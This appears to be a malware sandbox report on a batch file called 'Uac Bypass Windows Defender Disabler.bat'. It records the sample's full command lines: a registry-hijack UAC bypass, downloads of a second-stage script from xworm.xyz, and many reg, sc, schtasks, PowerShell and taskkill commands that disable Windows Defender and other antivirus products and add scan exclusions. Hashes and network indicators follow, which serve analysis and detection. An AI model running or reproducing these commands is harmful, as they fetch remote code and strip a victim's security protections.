Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\reg.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Stops running service(s)

evasion execution

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open\command C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5112 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5112 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2448 wrote to memory of 3052 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2448 wrote to memory of 3052 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 5112 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5112 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5112 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 5112 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 5112 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 2760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5112 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 5112 wrote to memory of 4896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4896 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 4416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 4896 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 3008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 4564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 5020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 4716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 4716 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2524 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 3708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4896 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 4080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4896 wrote to memory of 2184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start= disabled

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Roaming" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Local\Temp" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScheduledScan" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableTamperProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0 -PropertyType DWORD -Force"

C:\Windows\system32\sc.exe

sc stop mfevtp

C:\Windows\system32\sc.exe

sc config mfevtp start= disabled

C:\Windows\system32\sc.exe

sc stop mfefire

C:\Windows\system32\sc.exe

sc config mfefire start= disabled

C:\Windows\system32\sc.exe

sc stop mfehidk

C:\Windows\system32\sc.exe

sc config mfehidk start= disabled

C:\Windows\system32\sc.exe

sc stop mfeapfk

C:\Windows\system32\sc.exe

sc config mfeapfk start= disabled

C:\Windows\system32\sc.exe

sc stop mfeavfk

C:\Windows\system32\sc.exe

sc config mfeavfk start= disabled

C:\Windows\system32\sc.exe

sc stop mfefirek

C:\Windows\system32\sc.exe

sc config mfefirek start= disabled

C:\Windows\system32\sc.exe

sc stop avastsvc

C:\Windows\system32\sc.exe

sc config avastsvc start= disabled

C:\Windows\system32\sc.exe

sc stop avastui

C:\Windows\system32\sc.exe

sc config avastui start= disabled

C:\Windows\system32\sc.exe

sc stop nissrv

C:\Windows\system32\sc.exe

sc config nissrv start= disabled

C:\Windows\system32\sc.exe

sc stop Symantec AntiVirus

C:\Windows\system32\sc.exe

sc config "Symantec AntiVirus" start= disabled

C:\Windows\system32\sc.exe

sc stop ccSvcHst

C:\Windows\system32\sc.exe

sc config ccSvcHst start= disabled

C:\Windows\system32\sc.exe

sc stop NortonSecurity

C:\Windows\system32\sc.exe

sc config NortonSecurity start= disabled

C:\Windows\system32\sc.exe

sc stop Norton AntiVirus

C:\Windows\system32\sc.exe

sc config "Norton AntiVirus" start= disabled

C:\Windows\system32\taskkill.exe

taskkill /F /IM Mcafee

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcafee

C:\Windows\system32\taskkill.exe

taskkill /F /IM Mcafee.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcafee.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McUICnt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McPltCmd.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcuihost.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McInstru.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM avastui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ccSvcHst.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mfefirek.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mfehidk.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM avastsvc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McUICnt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McPltCmd.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ModuleCoreService.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ZhuDongFangYu.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM 360Safe.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM 360Tray.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ns.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 xworm.xyz udp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 193.114.54.198.in-addr.arpa udp
US 198.54.114.193:443 xworm.xyz tcp

Files

memory/2760-0-0x00007FFF88FD3000-0x00007FFF88FD5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_deai02lx.qec.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2760-9-0x000001C47AB30000-0x000001C47AB52000-memory.dmp

memory/2760-10-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp

memory/2760-11-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp

memory/2760-12-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp

memory/2760-16-0x00007FFF88FD0000-0x00007FFF89A92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

MD5 03bf8860dbd0724e466baf1e1bca86b3
SHA1 bde4d3ef9ac846e1e83bea37f88097cd370d5197
SHA256 968dc5ab087e7a593d9b2682c2f6ee8aa6fd756ae874328a12d892d2b68fd0af
SHA512 0f3f5492be21a3af8262363f3d593aa63080f2d2db574451d8b94d4f00c3c3f06cb17c5795e6cccef84e9ebe684062a51829139177f7539f6629373e56e2e92f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e6baeec02c3d93dce26652e7acebc90
SHA1 937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1cebd15e19078003226326aa50667159
SHA1 6d346e2ff9b8b6834a3e4b58240c41f5178e57f9
SHA256 ee661e2b1fa0a222a50eee925fae81512cc15faf5473a5740999e66f5eda4abe
SHA512 81ed3fd080d4e463514db6a6df8e54c24969ff8a2aea98f66153c12e0809b4e0429b2192f19afc1160ebe700c9774ce3e9e417ed3c2539e7bcbd996c94be75a4